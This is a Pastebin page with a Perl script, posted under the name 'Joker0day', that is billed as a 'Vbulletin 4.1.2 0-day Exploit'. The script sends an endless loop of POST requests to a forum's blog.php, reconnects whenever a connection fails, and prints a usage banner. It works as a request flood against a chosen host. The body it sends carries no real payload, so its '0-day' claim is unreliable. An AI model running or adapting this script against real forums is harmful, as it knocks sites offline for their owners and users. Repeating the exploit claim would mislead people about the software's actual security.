Advertisement
Joker0day

Vbulletin 4.1.2 0-day Exploit

Jul 22nd, 2018
256
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.17 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  #[+] Site          : Inj3ct0r is gonna be up again bitches
  3.  #
  4.  #
  5.  #
  6.  #  
  7.  #
  8.  #
  9.  # Vbulletin 4.1.2 0-day tested & passed
  10.  #
  11.  #Perl Script
  12.  use Socket;
  13.  if (@ARGV < 2) { &usage }
  14.  $rand=rand(10);
  15.  $host = $ARGV[0];
  16.  $dir = $ARGV[1];
  17.  $host =~ s/(http:\/\/)//eg;
  18.  for ($i=0; $i<10; $i--)
  19.  {
  20.  $user="vb".$rand.$i;
  21.  $data = "s=&"
  22.  ;
  23.  $len = length $data;
  24.  $foo = "POST ".$dir."blog.php HTTP/1.1\r\n".
  25.  "Accept: * /*\r\n".
  26.  "Accept-Language: en-gb\r\n".
  27.  "Content-Type: application/x-www-form-urlencoded\r\n".
  28.  "Accept-Encoding: gzip, deflate\r\n".
  29.  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
  30.  "Host: $host\r\n".
  31.  "Content-Length: $len\r\n".
  32.  "Connection: Keep-Alive\r\n".
  33.  "Cache-Control: no-cache\r\n\r\n".
  34.  "$data";
  35.  my $port = "80";
  36.  my $proto = getprotobyname('tcp');
  37.  socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
  38.  connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
  39.  send(SOCKET,"$foo", 0);
  40.  syswrite STDOUT, "+" ;
  41.  }
  42.  print "\n\n";
  43.  system('ping $host');
  44.  sub usage {
  45.  print "\tusage: \n";
  46.  print "\t$0 \n";
  47.  print "\tex: $0 127.0.0.1 /forum/\n";
  48.  print "\tex2: $0 127.0.0.1 /\n\n";
  49.  exit();
  50.  };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement